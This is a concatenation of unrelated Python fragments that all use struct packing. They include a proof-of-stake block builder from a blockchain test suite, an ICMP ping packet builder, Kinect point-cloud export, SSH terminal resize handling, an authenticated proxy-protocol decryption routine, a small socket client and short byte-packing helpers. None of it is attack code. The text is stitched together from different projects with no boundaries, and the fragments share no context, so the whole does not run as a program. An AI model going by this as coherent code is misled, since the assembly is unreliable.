def create_unsigned_pos_block(self, staking_prevouts, nTime=None, outNValue=10002, signStakeTx=True, bestBlockHash=None, coinStakePrevout=None): if not nTime: current_time = int(time.time()) + 15 nTime = current_time & 0xfffffff0 if not bestBlockHash: bestBlockHash = self.node.getbestblockhash() block_height = self.node.getblockcount() else: block_height = self.node.getblock(bestBlockHash)['height'] parent_block_stake_modifier = int( self.node.getblock(bestBlockHash)['modifier'], 16) parent_block_raw_hex = self.node.getblock(bestBlockHash, False) f = io.BytesIO(hex_str_to_bytes(parent_block_raw_hex)) parent_block = CBlock() parent_block.deserialize(f) coinbase = create_coinbase(block_height + 1) coinbase.vout[0].nValue = 0 coinbase.vout[0].scriptPubKey = b"" coinbase.rehash() block = create_block(int(bestBlockHash, 16), coinbase, nTime) block.hashPrevBlock = int(bestBlockHash, 16) if not block.solve_stake(parent_block_stake_modifier, staking_prevouts): return None # create a new private key used for block signing. block_sig_key = CECKey() block_sig_key.set_secretbytes(hash256(struct.pack('<I', 0xffff))) pubkey = block_sig_key.get_pubkey() scriptPubKey = CScript([pubkey, OP_CHECKSIG]) stake_tx_unsigned = CTransaction() if not coinStakePrevout: coinStakePrevout = block.prevoutStake stake_tx_unsigned.vin.append(CTxIn(coinStakePrevout)) stake_tx_unsigned.vout.append(CTxOut()) stake_tx_unsigned.vout.append( CTxOut(int(outNValue * COIN), scriptPubKey)) stake_tx_unsigned.vout.append( CTxOut(int(outNValue * COIN), scriptPubKey)) if signStakeTx: stake_tx_signed_raw_hex = self.node.signrawtransaction( bytes_to_hex_str(stake_tx_unsigned.serialize()))['hex'] f = io.BytesIO(hex_str_to_bytes(stake_tx_signed_raw_hex)) stake_tx_signed = CTransaction() stake_tx_signed.deserialize(f) block.vtx.append(stake_tx_signed) else: block.vtx.append(stake_tx_unsigned) block.hashMerkleRoot = block.calc_merkle_root() return (block, block_sig_key)
def dq(v): return pack("<Q", v)
def __init__(self, timeout=3): self.timeout = timeout self.__data = struct.pack('d', time.time()) self.__id = os.getpid() if self.__id >= 65535:self.__id = 65534
def __icmpPacket(self): header = struct.pack('bbHHh', 8, 0, 0, self.__id, 0) packet = header + self.__data chkSum = self.__inCksum(packet) header = struct.pack('bbHHh', 8, 0, chkSum, self.__id, 0) return header + self.__data
# color_inds = [[openni2.convert_depth_to_color(depth_stream, color_stream, i, j, depth_img[j, i]) # for i in range(640)] for j in range(480)] # points = np.array(points).reshape(-1, 3)*[1,1,-1] # color_inds = np.clip(np.array(color_inds).reshape(-1, 2), [0, 0], [640 - 1, 480 - 1]) # colors = color_img[color_inds[:, 1], color_inds[:, 0]] points = np.dot(cv2.convertPointsToHomogeneous(points)[:,0], T_mtx_T)[:, :3] pcd = open3d.PointCloud() pcd.points = open3d.Vector3dVector(points) pcd.colors = open3d.Vector3dVector(colors) # open3d.draw_geometries([pcd]) open3d.write_point_cloud(baseReadPath + dataset + "/" + "Kinect2__" + captureFolder + ".ply", pcd) with open(baseReadPath + dataset + "/" + "Kinect2__" + captureFolder + ".bin", "wb") as fp: fp.write(struct.pack("i", len(pcd.points))) for pt in pcd.points: fp.write( struct.pack("i", 3) + struct.pack("d", pt[0]) + struct.pack("d", pt[1]) + struct.pack("d", pt[2])) filterLocs = np.logical_and(np.logical_and(points[:, 2] < 950, points[:, 2] > 200), np.logical_and(np.logical_and(points[:, 0] < 530, points[:, 0] > -60), np.logical_and(points[:, 1] < 160, points[:, 1] > -350))) points = points[filterLocs] colors = colors[filterLocs] pcd = open3d.PointCloud() pcd.points = open3d.Vector3dVector(points) pcd.colors = open3d.Vector3dVector(colors) open3d.write_point_cloud(baseReadPath + dataset + "/" + "filtered__Kinect2__" + captureFolder + ".ply", pcd)
def big_endian(i): """Convert int to a big-endian integer """ return int.from_bytes(struct.pack('>i', i), byteorder = sys.byteorder)
def encode_color(value): if len(value) == 3: return struct.pack("4f", *(value[0], value[1], value[2], 1.0)) else: return struct.pack("4f", *(value[0], value[1], value[2], value[3]))
def encode_quaternion(value): return struct.pack("4f", *(value.w, value.x, value.y, value.z))
def word(c): return struct.pack("=h", c)
def encode_vector4(value): return struct.pack("4f", *(value[0], value[1], value[2], value[3]))
def _windowResized(self, *args): winsz = fcntl.ioctl(0, tty.TIOCGWINSZ, '12345678') winSize = struct.unpack('4H', winsz) newSize = winSize[1], winSize[0], winSize[2], winSize[3] self.conn.sendRequest(self, 'window-change', struct.pack('!4L', *newSize))
def encode_int(value): return struct.pack("i", value)
# REQUEST must be in format "CC/id/cc/words" or "XY/id/lon/lat/words". # import socket import struct import sys def die_usage(): sys.stdout.write("usage: %s CC/id/cc/words|XY/id/lon/lat/words\n" % sys.argv[0]) sys.exit(1) if (len(sys.argv) != 2): die_usage() arglen = len(sys.argv[1].split('/')) if (arglen < 4) or (arglen > 5): die_usage() sock = socket.create_connection(('localhost', 8033)) data = sys.argv[1].encode('utf-8') length = len(data) sock.sendall(struct.pack('I', length) + data) lendata = sock.recv(4) if len(lendata) == 0: exit length = struct.unpack('I', lendata) print(sock.recv(length[0]).decode('utf-8'))
def encode_vector2(value): return struct.pack("2f", *(value.x, value.y))
def init_from_bin_len(self, bin, length): if len(bin) < 16: bin += b'\0' * 16 self.v0 = struct.unpack('<Q', struct.pack('<H', length) + bin[2:8])[0] self.v1 = struct.unpack('<Q', bin[8:16])[0]
def encode_float(value): return struct.pack("f", value)
def server_post_decrypt(self, buf): if self.raw_trans: return (buf, False) self.recv_buf += buf out_buf = b'' sendback = False if not self.has_recv_header: if len(self.recv_buf) >= 12 or len(self.recv_buf) in [7, 8]: recv_len = min(len(self.recv_buf), 12) mac_key = self.server_info.recv_iv + self.server_info.key md5data = hmac.new(mac_key, self.recv_buf[:4], self.hashfunc).digest() if md5data[:recv_len - 4] != self.recv_buf[4:recv_len]: return self.not_match_return(self.recv_buf) if len(self.recv_buf) < 12 + 24: return (b'', False) self.last_client_hash = md5data uid = struct.unpack('<I', self.recv_buf[12:16])[0] ^ struct.unpack('<I', md5data[8:12])[0] self.user_id_num = uid uid = struct.pack('<I', uid) if uid in self.server_info.users: self.user_id = uid self.user_key = self.server_info.users[uid] self.server_info.update_user_func(uid) else: self.user_id_num = 0 if not self.server_info.users: self.user_key = self.server_info.key else: self.user_key = self.server_info.recv_iv md5data = hmac.new(self.user_key, self.recv_buf[12: 12 + 20], self.hashfunc).digest() if md5data[:4] != self.recv_buf[32:36]: logging.error('%s data uncorrect auth HMAC-MD5 from %s:%d, data %s' % ( self.no_compatible_method, self.server_info.client, self.server_info.client_port, binascii.hexlify(self.recv_buf) )) if len(self.recv_buf) < 36: return (b'', False) return self.not_match_return(self.recv_buf) self.last_server_hash = md5data encryptor = encrypt.Encryptor(to_bytes(base64.b64encode(self.user_key)) + self.salt, 'aes-128-cbc') head = encryptor.decrypt(b'\x00' * 16 + self.recv_buf[16:32] + b'\x00') # need an extra byte or recv empty self.client_over_head = struct.unpack('<H', head[12:14])[0] self.recv_tcp_mss = struct.unpack('<H', head[14:16])[0] self.send_tcp_mss = self.recv_tcp_mss utc_time = struct.unpack('<I', head[:4])[0] client_id = struct.unpack('<I', head[4:8])[0] connection_id = struct.unpack('<I', head[8:12])[0] time_dif = common.int32(utc_time - (int(time.time()) & 0xffffffff)) if time_dif < -self.max_time_dif or time_dif > self.max_time_dif: logging.info('%s: wrong timestamp, time_dif %d, data %s' % ( self.no_compatible_method, time_dif, binascii.hexlify(head) )) return self.not_match_return(self.recv_buf) elif self.server_info.data.insert(self.user_id, client_id, connection_id): self.has_recv_header = True self.client_id = client_id self.connection_id = connection_id else: logging.info('%s: auth fail, data %s' % (self.no_compatible_method, binascii.hexlify(out_buf))) return self.not_match_return(self.recv_buf) self.on_recv_auth_data(utc_time) self.encryptor = encrypt.Encryptor( to_bytes(base64.b64encode(self.user_key)) + to_bytes(base64.b64encode(self.last_client_hash)), 'chacha20', self.last_server_hash[:8]) self.encryptor.encrypt(b'') self.encryptor.decrypt(self.last_client_hash[:8]) self.recv_buf = self.recv_buf[36:] self.has_recv_header = True sendback = True while len(self.recv_buf) > 4: mac_key = self.user_key + struct.pack('<I', self.recv_id) recv_buf = self.recv_buf data_len = struct.unpack('<H', recv_buf[:2])[0] ^ struct.unpack('<H', self.last_client_hash[14:16])[0] cmd_len = 0 while data_len >= 0xff00: if data_len == 0xff00: cmd_len += 2 self.recv_tcp_mss = self.send_tcp_mss recv_buf = recv_buf[2:] data_len = struct.unpack('<H', recv_buf[:2])[0] ^ struct.unpack('<H', self.last_client_hash[12:14])[0] else: self.raw_trans = True self.recv_buf = b'' if self.recv_id == 1: logging.info(self.no_compatible_method + ': over size') return (b'E' * 2048, False) else: raise Exception('server_post_decrype data error') rand_len = self.recv_rnd_data_len(data_len + cmd_len, self.last_client_hash, self.random_client) length = data_len + rand_len if length >= 4096: self.raw_trans = True self.recv_buf = b'' if self.recv_id == 1: logging.info(self.no_compatible_method + ': over size') return (b'E' * 2048, False) else: raise Exception('server_post_decrype data error') if length + 4 > len(recv_buf): break client_hash = hmac.new(mac_key, self.recv_buf[:length + cmd_len + 2], self.hashfunc).digest() if client_hash[:2] != self.recv_buf[length + cmd_len + 2: length + cmd_len + 4]: logging.info('%s: checksum error, data %s' % ( self.no_compatible_method, binascii.hexlify(self.recv_buf[:length + cmd_len]), )) self.raw_trans = True self.recv_buf = b'' if self.recv_id == 1: return (b'E' * 2048, False) else: raise Exception('server_post_decrype data uncorrect checksum') self.recv_id = (self.recv_id + 1) & 0xFFFFFFFF pos = 2 if data_len > 0 and rand_len > 0: pos = 2 out_buf += self.encryptor.decrypt(recv_buf[pos: data_len + pos]) self.last_client_hash = client_hash self.recv_buf = recv_buf[length + 4:] if data_len == 0: sendback = True if out_buf: self.server_info.data.update(self.user_id, self.client_id, self.connection_id) return (out_buf, sendback)
def p(x): return struct.pack('<I', x)